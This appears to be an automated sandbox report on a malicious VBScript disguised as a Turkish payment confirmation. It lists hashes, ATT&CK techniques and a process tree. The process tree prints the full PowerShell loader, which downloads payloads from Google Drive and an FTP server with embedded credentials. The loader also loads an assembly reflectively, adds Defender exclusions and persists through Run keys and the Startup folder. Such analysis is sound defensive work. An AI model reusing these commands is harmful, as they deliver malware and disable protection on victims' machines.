Analysis
max time kernel: 73s
max time network: 63s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-10-2024 13:04
Static task: static1
Behavioral task: behavioral1
Sample: Ödeme Onayı.vbs
Resource: win7-20241010-en
Behavioral task: behavioral2
Sample: Ödeme Onayı.vbs
Resource: win10v2004-20241007-en
General
Target: Ödeme Onayı.vbs
Size: 585KB
MD5: e8b451ec06c7782196418eb73e4b0731
SHA1: 0b0b23f532f7e6241fabe6eb5cb1e8490b3dd1f4
SHA256: 3e0f0059d28f652c2575514c53d31dbfa1c96bd13d1f3457a22fd0dca5336011
SHA512: a3b40c48836fe2dcb84c3803a1a815039a93b4463e0acbe90372610b64663d40c6642461cfa8931bcb199cb43f842f9552e08b95d7108578847b14cbb7742918
SSDEEP: 1536:l/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/F/i/i/i/i/i/i/i/i/i/i/i/i/iW:j3Jg6azbLal3Jg6azbLal3Jg6azbLaO
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures
-
Blocklisted process makes network request 20 IoCs
flow | pid | Process
12 | 4504 | powershell.exe
25 | 4504 | powershell.exe
28 | 2380 | powershell.exe
34 | 4504 | powershell.exe
35 | 4504 | powershell.exe
37 | 4504 | powershell.exe
39 | 4504 | powershell.exe
40 | 4504 | powershell.exe
53 | 4504 | powershell.exe
54 | 4504 | powershell.exe
55 | 4504 | powershell.exe
56 | 4504 | powershell.exe
57 | 4504 | powershell.exe
58 | 4504 | powershell.exe
59 | 4504 | powershell.exe
60 | 4504 | powershell.exe
64 | 4504 | powershell.exe
65 | 4504 | powershell.exe
68 | 4504 | powershell.exe
69 | 4504 | powershell.exe
-
pid | Process
4620 | powershell.exe
4504 | powershell.exe
1184 | powershell.exe
4672 | powershell.exe
2460 | powershell.exe
4740 | powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Drops startup file 4 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs | cmd.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_wma = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\iebos.ps1' \";exit" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_yla = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\iebos.ps1' \";exit" | powershell.exe
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
4808 | PING.EXE
-
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
4808 | PING.EXE
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid | Process
4620 | powershell.exe
4620 | powershell.exe
4504 | powershell.exe
4504 | powershell.exe
2380 | powershell.exe
2380 | powershell.exe
4672 | powershell.exe
1184 | powershell.exe
4672 | powershell.exe
1184 | powershell.exe
4672 | powershell.exe
1184 | powershell.exe
2460 | powershell.exe
2460 | powershell.exe
2460 | powershell.exe
4740 | powershell.exe
4740 | powershell.exe
4740 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4620 | powershell.exe
Token: SeDebugPrivilege | 4504 | powershell.exe
Token: SeDebugPrivilege | 2380 | powershell.exe
Token: SeDebugPrivilege | 4672 | powershell.exe
Token: SeDebugPrivilege | 1184 | powershell.exe
Token: SeDebugPrivilege | 2460 | powershell.exe
Token: SeDebugPrivilege | 4740 | powershell.exe
-
Suspicious use of WriteProcessMemory 52 IoCs
description | pid | Process | procid_target
PID 980 wrote to memory of 4620 | 980 | WScript.exe | 84
PID 980 wrote to memory of 4620 | 980 | WScript.exe | 84
PID 4620 wrote to memory of 4504 | 4620 | powershell.exe | 86
PID 4620 wrote to memory of 4504 | 4620 | powershell.exe | 86
PID 4504 wrote to memory of 4072 | 4504 | powershell.exe | 95
PID 4504 wrote to memory of 4072 | 4504 | powershell.exe | 95
PID 4504 wrote to memory of 4808 | 4504 | powershell.exe | 96
PID 4504 wrote to memory of 4808 | 4504 | powershell.exe | 96
PID 4504 wrote to memory of 2380 | 4504 | powershell.exe | 100
PID 4504 wrote to memory of 2380 | 4504 | powershell.exe | 100
PID 4504 wrote to memory of 4672 | 4504 | powershell.exe | 102
PID 4504 wrote to memory of 4672 | 4504 | powershell.exe | 102
PID 4504 wrote to memory of 1184 | 4504 | powershell.exe | 103
PID 4504 wrote to memory of 1184 | 4504 | powershell.exe | 103
PID 4504 wrote to memory of 4108 | 4504 | powershell.exe | 104
PID 4504 wrote to memory of 4108 | 4504 | powershell.exe | 104
PID 4504 wrote to memory of 2460 | 4504 | powershell.exe | 108
PID 4504 wrote to memory of 2460 | 4504 | powershell.exe | 108
PID 4504 wrote to memory of 4740 | 4504 | powershell.exe | 109
PID 4504 wrote to memory of 4740 | 4504 | powershell.exe | 109
PID 4504 wrote to memory of 3412 | 4504 | powershell.exe | 110
PID 4504 wrote to memory of 3412 | 4504 | powershell.exe | 110
PID 4504 wrote to memory of 2616 | 4504 | powershell.exe | 111
PID 4504 wrote to memory of 2616 | 4504 | powershell.exe | 111
PID 4504 wrote to memory of 572 | 4504 | powershell.exe | 112
PID 4504 wrote to memory of 572 | 4504 | powershell.exe | 112
PID 4504 wrote to memory of 2900 | 4504 | powershell.exe | 113
PID 4504 wrote to memory of 2900 | 4504 | powershell.exe | 113
PID 4504 wrote to memory of 2200 | 4504 | powershell.exe | 118
PID 4504 wrote to memory of 2200 | 4504 | powershell.exe | 118
PID 4504 wrote to memory of 864 | 4504 | powershell.exe | 119
PID 4504 wrote to memory of 864 | 4504 | powershell.exe | 119
PID 4504 wrote to memory of 4796 | 4504 | powershell.exe | 120
PID 4504 wrote to memory of 4796 | 4504 | powershell.exe | 120
PID 4504 wrote to memory of 4496 | 4504 | powershell.exe | 121
PID 4504 wrote to memory of 4496 | 4504 | powershell.exe | 121
PID 4504 wrote to memory of 3264 | 4504 | powershell.exe | 122
PID 4504 wrote to memory of 3264 | 4504 | powershell.exe | 122
PID 4504 wrote to memory of 2644 | 4504 | powershell.exe | 123
PID 4504 wrote to memory of 2644 | 4504 | powershell.exe | 123
PID 4504 wrote to memory of 2532 | 4504 | powershell.exe | 124
PID 4504 wrote to memory of 2532 | 4504 | powershell.exe | 124
PID 4504 wrote to memory of 2084 | 4504 | powershell.exe | 125
PID 4504 wrote to memory of 2084 | 4504 | powershell.exe | 125
PID 4504 wrote to memory of 4352 | 4504 | powershell.exe | 126
PID 4504 wrote to memory of 4352 | 4504 | powershell.exe | 126
PID 4504 wrote to memory of 2460 | 4504 | powershell.exe | 127
PID 4504 wrote to memory of 2460 | 4504 | powershell.exe | 127
PID 4504 wrote to memory of 1416 | 4504 | powershell.exe | 129
PID 4504 wrote to memory of 1416 | 4504 | powershell.exe | 129
PID 4504 wrote to memory of 2940 | 4504 | powershell.exe | 130
PID 4504 wrote to memory of 2940 | 4504 | powershell.exe | 130
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = '[obfuscated Base64 string]';$wfjhv = $qKKzc; ;$wfjhv = $qKKzc.replace('уЦϚ' , 'B') ;;$qjxvb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $wfjhv ) ); $qjxvb = $qjxvb[-1..-$qjxvb.Length] -join '';$qjxvb = $qjxvb.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs');powershell $qjxvb 2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$wtjnl = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$wtjnl = ($wtjnl + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$wtjnl = ($wtjnl + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$cwwjv = (New-Object Net.WebClient);$cwwjv.Encoding = [System.Text.Encoding]::UTF8;$cwwjv.DownloadFile($wtjnl, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$jnkyw = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $jnkyw -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$svrbp = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $svrbp -OutFile $obTxq -UseBasicParsing } ;$wxlhh = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $wxlhh.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/oc.ngisedlartuen//:sptth' , $XhRTo , 'D DD' ) );};" 3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c 4⤵
PID:4072
-
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1 4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABvAGIAVAB4AHEAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAHMAdgByAGIAcAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABvAGIAVAB4AHEAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJABzAHYAcgBiAHAAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AYgBUAHgAcQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAA= -inputFormat xml -outputFormat text 4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; 4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; 4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\" 4⤵
PID:4108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\\x11.ps1" 4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\\x22.ps1" 4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
- Drops startup file
PID:3412
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:2616
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
- Drops startup file
PID:572
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:2900
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
- Drops startup file
PID:2200
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:864
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
PID:4796
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:4496
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
PID:3264
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:2644
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
PID:2532
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:2084
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
PID:4352
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:2460
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
PID:1416
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:2940
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs" 4⤵
PID:4804
-
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" 4⤵
PID:3088
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
Defense Evasion
- Indicator Removal (1)
- File Deletion (1)
- Modify Registry (1)
- Obfuscated Files or Information (1)
- Command Obfuscation (1)
Downloads